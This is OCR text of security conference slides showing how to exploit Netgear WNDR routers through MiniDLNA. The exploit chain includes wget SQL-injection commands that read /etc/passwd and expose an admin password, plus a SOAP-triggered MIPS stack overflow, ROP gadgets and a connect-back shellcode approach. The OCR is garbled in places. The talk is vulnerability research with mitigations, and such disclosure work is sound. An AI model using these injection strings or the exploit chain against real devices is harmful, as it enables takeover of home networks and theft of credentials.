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What I’m going to talk about 


Novel uses of SQL injection 
Buffer overflows on MIPS architecture 
0-day Vulnerabilities in Netgear routers 
Embedded device investigation process 
Live demo: Root shell & more 
Questions 



Read the paper 


Lots of essential details 

Not enough time in this talk to cover it all 

Please read it 



Why attack SOHO routers? 


Offers attacker privileged vantage point 

Exposes multiple connected users to attack 

Exposes all users’ Internet comms to snooping/ 
manipulation 

Often unauthorized side doors into enterprise networks 



Target device: Netgear 
WNDR3700 v3 


Fancy-pants SOHO 
Wireless Router 

DLNA Multimedia 
server 

File server w/USB 
storage 












Very popular on Amazon 


'k'k'k'k'k Just what I wanted—lots of easy 0-days, July 19, 2012 
By Zachary Cutlip (Silver Spring, MD USA) - See all mv reviews 

REAL NRME 

( Edit review^ ( Delete review) 

This review Is from: Netgear WNDR3700 N600 Dual Band Gigabit Wireless Router (Personal 
Computers) 

This device is perfect for my needs. Plenty of trivially exploitable vulnerabilities that 
will give you the admin password, WPA key, and even pop a remote root shell. Plus, 
















other affected devices 


Netgear WNDR 3800 
Netgear WNDR 4000 
Netgear WNDR 4400 



First step: take it apart 











UART 

header 









UART to USB 
adapter 





USB port 


Helps analysis 

Retrieve SQLite DB 

Load a debugger 
onto the router 








Analyzing the Device 
Software 


Download firmware update from 
vendor, unpack 

See Craig Heffner’s blog for more on 
firmware unpacking 



http://www.devttvsO.com/bloq 












$ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chk 


DECIMAL HEX DESCRIPTION 


86 0x56 LZMA compressed data 

1423782 0x15B9A6 Squashfs filesystem 

$ dd if=WNDR3700v3-V1.0.0.18_1.0.14.chk of=kemel.7z bs=1 skip=86 count=1423696 
$ p7zip -d kernel.7z 
$ strings kernel | grep 'Linux version' 

Linux version 2.6.22 ( peter@localhost.localdomain) (gcc version 4.2.3) #1 Wed Sep 14 
10:38:51 GST 2011 


Linux—Woo hoo! 




Target Application 
MiniDLNA 


$ Is -I rootfs/usr/sbin/minidlna.exe 

-rwxr-xr-x 1 root root 256092 2012-02-16 14:37 rootfs/usr/sbi 
$ file rootfs/usr/sbin/minidlna.exe 

rootfs/usr/sbin/minidlna.exe: ELF 32-bit LSB executable, MIPS 
d (uses shared libs), stripped 

I 





What is DLNA? 


Digital Living Network 
Alliance 

Interoperability 
between gadgets 

Multimedia playback, 
etc. 

But Most Importantly... 










Attack Surface 



Google reveals: open 
source! 



MiniDLNA I Free Audio & Video; 

sourceforge.net/projects/minidlna/ ^ 
Dec 18, 2011 - MiniDLNA (aka ReadyDI 
fully compliant with DLNA/UPnP-AV cliei 

Download - Forums - Files - Support 







Source code analysis 


‘strings’ reports shipping binary is 1.0.18 
Download source for our version. 

Search source for low-hanging fruit 



SQL injection: more than 
meets the eye 


Privileged access to data 
What if the data is not sensitive or valuable? 
Opportunity to violate developer assumptions 
You know what happens when you assume... 
Your shit gets owned. 



Vulnerability 1: SQL injection 


grep -rn SELECT * | grep ‘%s’ 

21 results, such as: 

sprintf(sqLbuf, "SELECT PATH from ALBUM_ART 
where ID = %s", object); 



Closer look 


void 

SendResp_albumArtCstruct upnphttp ♦ h, char ♦ object) 

{ 

cKop header [1500]; 
char sql.buf [256] ; 

/*...abbreviated ...V 

dash = strchrCobject, '-*); 
if( dash ) 

♦dash = *\0' ; 

sprintf(sql_buf, "SELECT PATH from ALBUM.ART where ID = %s'\ object); 
sql_get_tableCdb, sql.buf, &result, &rows, NULL); 

I /*.. . abbreviated... V 


} 






Closer look 


sprintfCsql_bLif, "SELECT PATH from ALBUM_ART where ID = %s", object); 
sql_get_tableCdb, sql_buf, iresult, &rows, HULL); 





Album art query 


1 © o o 1 

II i^i«-ji!»noj! + 

0 http: //10.10.10.1:8200/AlbumArt/ 1-foo.jpg 





















Test the vulnerability 


$ wget http://10.10.10.1:8200/ 
AlbumArt/"!; INSERT/**/into/**/ 
ALBUM_ART(ID,PATH)/**/ 

VALUES('31337',’pwned') 
throwaway.j pg 



wOOt! Success! 


sqlite> select * from ALBUM_ART where 
10=31337; 

31337 Ipwned 



Good news / Bad news 


Working SQL injection 

Trivial to exploit 

No valuable information 

Even if destroyed, DB is regenerated 



Vulnerability 2: Remote File 
Extraction 



MiniDLNA Database: 


sql1te> select * from ALBUM_ART; 

1 I /tmp/mnt/usbO/part1/ 

. ReadyDLNA//art_cache/tmp/shares/ 
USB_Storage/01 - Unforgivable 
(First State Remix).jpg 



Test the Vulnerability 


$ wget http://10.10.10.1:8200/ 
AlbumArt/ "!:INSERT/**/Into/**/ 
ALBUM_ART(ID,PATH)/**/ 

VALUES('31337','/etc/passwd');" 
throwaway.j pg 

$ wget http://10.10.10.1:8200/ 
AlbumArt/31337-18.]pg 



Passwords 


$ cat 31337-18.jpg 
nobody:*:0:0:nobody:/:/bin/sh 
admin:qw12QW!@:0:0:adnnin:/:/bin/sh 
guest:guest:0:0:guest:/:/bin/sh 



admin:qw12QW!@:0:0:admin:/:/bin/sh 



Vulnerability 3: Remote 
Code Execution 



i.e., pop root 



Party like it’s 1996. 



$ find . -name \*.c -print | xargs grep 
-E \ 

' sprintfX(IstrcatX(IstrcpyX(' | X 

grep -V asprintf | wc -1 

265 <“OMG exploit city 



265 <—No, seriously. WTF. 



static int 

callbackCvoid *args, int argc, char ♦*argv, char ♦♦azColName) 

{ 

struct Response ♦passed.args = (struct Response ♦)args; 

char ♦id = argv[0], ♦parent = argv[l], ♦refID = argv[2], ♦detaillD = argv[3], 
/♦ ... V 

♦album.art = argv[22]; 

/♦.. .abbreviated... */ 
char str.buf [512] ; 

/♦... abbreviated... */ 

if( album.art && atoi(albuin_art) && 

(passed_args->filter & FILTER_UPNP_ALBUMARTURI) ) { 
ret = sprintf(str_buf , 

|"&gt; http: //%s : 5lW/AlbumArt/Xs-?te . jpg&lt; /upnp: albumArtURI&gt;" , 
lan_Qddr[0] .str, runtime.vars. port, album.art, detaillD]; 
memcpy(passed_args->resp+passed_Qrgs->size, &str_buf, ret+i); 
passed_args->size += ret; 

/♦... abbreviated... */ 

} 

return 0; 

i_ 








if( album.art && atoi(album_art) && 

Cpassed_args->fllter & FILTER_UPNP^ALB UMARTURI ) ) { 
ret = sprintfCstr^buf, 

|"&gt; http: //%s :5W/AlbumArt/5iSs-5lte . jpg&lt; /upnp: albunvArtURI&gt; ” , | 
lan_addr[0].str, runtlme^vars.port, album^art, detaillD); i 








Left join 


SELEa o.OBJECT.ID, o.PARENT_ID, o.REF_ID. o.DETAIL.ID, o.CLASS, 
d.SIZE, d.TITLE, d.DURATION, d.BITRATE, d.SAMPLERATE, 
d.ARTIST, d.ALBUM, d.GENRE, d.COMMENT, d.CHANNELS, d.TRACK, 
d.DATE, d.RESOLUTION,d.THUMBNAIL, d.CREATOR, d.DLNA_PN, 
d.MIME, d.ALBUM_ART, d.DISC 

from OBJECTS o left join DETAILS d on Cd.ID - o.DETAIL.ID) 
where OBJECT.ID - ’SSs’ 







Left join 


d.ALBUM_ART, d.DISC 

left join DETAILS d on Cd.ID - o.DETAIL.ID) 





album_ai1: in sprintfO is DETAILS.ALBUM_ART. 
Schema shows it’s an I NT. 


sql1te> .schema DETAILS 

CREATE TABLE DETAILS ( ID INTEGER PRIMARY KEY 
AUTOINCREMENT, 

ALBUM_ART INTEGER DEFAULT 


0 , ...); 



Two things to note 

DETAILS.ALBUM_ART is an iNT, but it can store 
arbitrary data 

This is due to “type affinity” 

caiibackO attempts to “vaiidate” using atoiQ, but this 
busted 

atoi(“1_omg_iearn_to_c0d3”) == 1 
ALBUM_ART need oniy start with a (non-zero) int 
Weak sauce 



Exploitable buffer overflow? 


We have full control over the DB from Vuin #1 
We need to: 

Stage shellcode in database 
Trigger query of our staged data 



SQL injection limitation 


Limited length of SQL injection, approx. 128 bytes per 
pass. 

Target buffer is 512 bytes. 

SQLite concatenation operator: “||” 

UPDATE DETAILS set ALBUM_ART=ALBUM_ART|| 
“AAAA” where ID=3 



Trigger query of staged 
exploit 


Model DLNA in Python 
Python Coherence library 
Capture conversation in Wireshark 
Save SOAP request for playback with wget 



Wireshark capture 


POST /ctl/ContentDir HTTP/1.0 
Host: 10.10.10.1 
User-Agent: Twisted PageGetter 
Content-Length: 450 

SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:l#Browse" 
content-type: text/xml ;charset=”utf-8" 
connection: close 

<?xml version="1.0” encoding=”utf-8”?xs:Envelope s:encodingStyle="http://schemas.xmlsoap.org/so 
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"xs:Bodyxns0:Browse xmlns:ns0=”urn:schemas-i 
0 rg: service: ContentDirecto ry: l”xObjectID>PWNED</ObjectIDxBrowseFlag>BrowseDirectChildren</Brov 
FilterxStartingIndex>0</StartingIndexxRequestedCount>100</RequestedCountxSortCriteria /x/ns0 
s:Envelope>HTTP/l.l 200 OK 
Content-Type: text/xml; charset="utf-8" 

Connection: close 
Content-Length: 1154 

Server: Linux 2.6 DLNADOC/1.50 UPnP/1.0 MiniDLNA/1.0 
<?xml version="1.0" encoding="utf-8"?> 

---- w„1 --- „ -- t - -- /- / M ^ 













SOAP request 


<?xml version=''l.^'' encocling="\xtf-di"7> 

<s:Envelope x/wZns;s=" http://schemas.xmlsoap.org/soap/envelope/" 
s; encodingStyle=" http://schemas.xmlsoap.org/soap/encoding/"> 

<s:Body> 

<ns0:Browse x/wZns ;/7s0="urn:schemas-upnp-org:service:ContentDirectory: 1"> 
<ObjectID>PWNED</ObjectID> 
<BrowseFlag>BrowseDirectChildren</BrowseFlag> 

<Filter>*</Filter> 

<StartingIndex>0</StartingIndex> 

<RequestedCount>100</RequestedCount> 

<SortCriteria/> 

</ns0:Browse> 

</s:Body> 

</s:Envelope> 







Things you need 


Console access to the device 
There is a UART header on the PCB 
gdbserver cross-compiled for MIPS 
gdb compiled for MIPS target architecture 



Test the vulnerability 


Attach gdbserver on the target to minidlna.exe 
Connect local gdb to remote sesion 
Use wget to SQL inject overflow data 
Set up initial reoords in OBJECTS and DETAILS 
Build up overflow data 
Use wget to POST the SOAP request 
How muoh overflow data? 



Trigger the exploit 


$ wget http://10.10.10.1:8200/ctl/ContentDir \ 
-header="Host: 10.10.10.1" \ 

--header=\ 

'SOAPACTION: "urn:schemas-upnp- 
org:service:ContentDirectory:1 #Browse"' \ 
--header="'content-type: text/xml ;charset="utf-8"' \ 
-header="connection: close" \ 
-post-file=./soaprequest.xml 



wOOt! Success! 


0x2af4241c <_multf3+2364>: li v0,-l 

0x2af42420 < multf3+2368>: move sp,s8 


0x2af423fc in _multf3 () from /lib/libgcc_s.so.1 

(gdb) c 
Continuing. 

Program received signal SIGSEGV, Segmentation fault. 


[registers] 


V0 

00000000 

VI: 

00000535 

A0: 

2B47953E 

Al: 

7FF44D1C 

A2 

00000002 

A3: 

7FF44D1C 

T0: 

00000000 

Tl: 

74672672 

T2 

00000000 

T3: 

7FF449D0 

T4: 

2AF88018 

T5: 

2AFCC004 

T6 

73616C63 

T7: 

74672673 

50: 

41414141 

SI: 

41414141 

S2 

41414141 

S3: 

41414141 

S4: 

41414141 

S5: 

41414141 

S6 

41414141 

S7: 

41414141 

T8: 

00000000 

T9: 

2AF616F0 

GP 

00483E20 

S8: 

41414141 

HI: 

00000008 

LO: 

00000000 

SP 

7FF44F80 

PC: 

41414141 

RA: 

41414141 



[code] 


0x41414141: Error while running hook_stop: 
Cannot access memory at address 0x41414140 
0x41414140 in ?? 0 
(gdb) Q 











We control the horizontal 
and the vertical 


We own the program counter, and therefore execution 
Also all “S” registers: $S0-$S8 
Useful for Return Oriented Programming exploit 



Owning $PC is great, but 
give me a shell 



Getting Execution: 
Challenges 


Stack ASLR 

MIPS Architecture idiosyncrasies 

Return Oriented Programming is limited (but possible) 

“Bad” Characters due to HTTP & SQL 



Getting Execution 
Advantages 


No ASLR for executable, heap, & libraries 
Executable stack 



ROP on MIPS 


All MIPS instructions are 4-bytes 

All MIPS mennory access must be 4-byte aligned 

No jumping into the middle of instructions 



ROP on MIPS 


We can return into useful instruction sequences: 
Manipulate registers 

Load $PC from registers or memory we control 
Help locate stack, defeating ASLR 



Locate stack using ROP 


.text:2B119D2C 

.tezt:aB]|lf930 

.tezt:2B119034 

.tezt:2B119D38 

.tezt:2B11903C 

.tezt:2B119D40 

.tezt:2B119044 

.tezt:2B119048 

.tezt:2B119D4C 

.tezt:2B119050 

.tezt:2B119054 

.tezt:2B119D58 


addlu 

addlu 

addlu 

BW 

BW 

•ove 

Iw 

addlu 

BK>ve 

Iw 

Bove 

jalr 


$b 4, $Bp, 0zl58'*'var_38 
$b6, $Bp, 0zl58-^var_30 
$b 3, $Bp, 0zl58'^var_2C 
$b 3, 0zl58-*-var_148($Bp) 

$b 2, 0zl58-*'var~144($Bp) 

5a0, $Bl 

$al, -0z7rC8($9p) 

Sal, (aFlBpegvo_0_DLl - Oz2B188000) # 'FFBpe^ Vld.ld.ld / 11 

5a2, 5 b4 _ 

$t9, -^^■($9P) 

$t9, $b 0 
5t9 


Load several offsets from stack pointer into 
$S3,$S4,$S6 

Load $S0 into $T9 and jump 






MIPS cache coherency 


MIPS has two parallel caches: 
Instruction Cache 
Data Cache 

Payload written to the stack as data 
Resides in data cache until flushed 



MIPS Cache Coherency 


Can’t execute off stack until cache is flushed 
Write lots to memory, trigger flush? 

Cache is often 32K-64K 
Linux provides cacheflushQ system call 


POP into it 



Bad characters 


Common challenge with shellcode 
Spaces break HTTP 
Null bytes break strcpyO/sprintfO 
scute also has bad characters 
e.g., OxOd, carriage return 
scute escape to the resoue: “x’Od”’ 



\x7a\x69\xce\xe4\xff 
X’0d’”, 

\x3c\x0a\x0a\xad\x35 



NOP Instruction 

MIPS NOP is 
\x00\x00\x00\x00 

Use some other inert 
instruction 

I used: 

nor t6,t6,zero 
\x27\x70\xc0\x01 



Trouble with Encoders 


Metasploit payload + XOR Encoder==No Joy 
Metasploit only provides one of each on MIPS 
Caching problem? 

Wrote my own NUL-safe connect-back payload 
No need for encoder 

Pro Tip: Avoid endianness problems by connecting 
back to 10.10.10.10 



Overflow diagram 















Demo Time 



How to suck less hard 


Establish security requirements 
Self protection 
Network protection 
Less crappy programming 
sqlite3_snprintf() 

Privilege separation 

Mandatory Access Controls, e.g. SELinux 



Upshot 


Developer assumes well-formed data 

Compromise database integrity, violate developer 
assumptions 

Even if the database is low value 



Zachary Cutlip 
Contact Info 


Twitter: ©zcutlip 
zcutlip@tacnetsol.com 



Questions? 



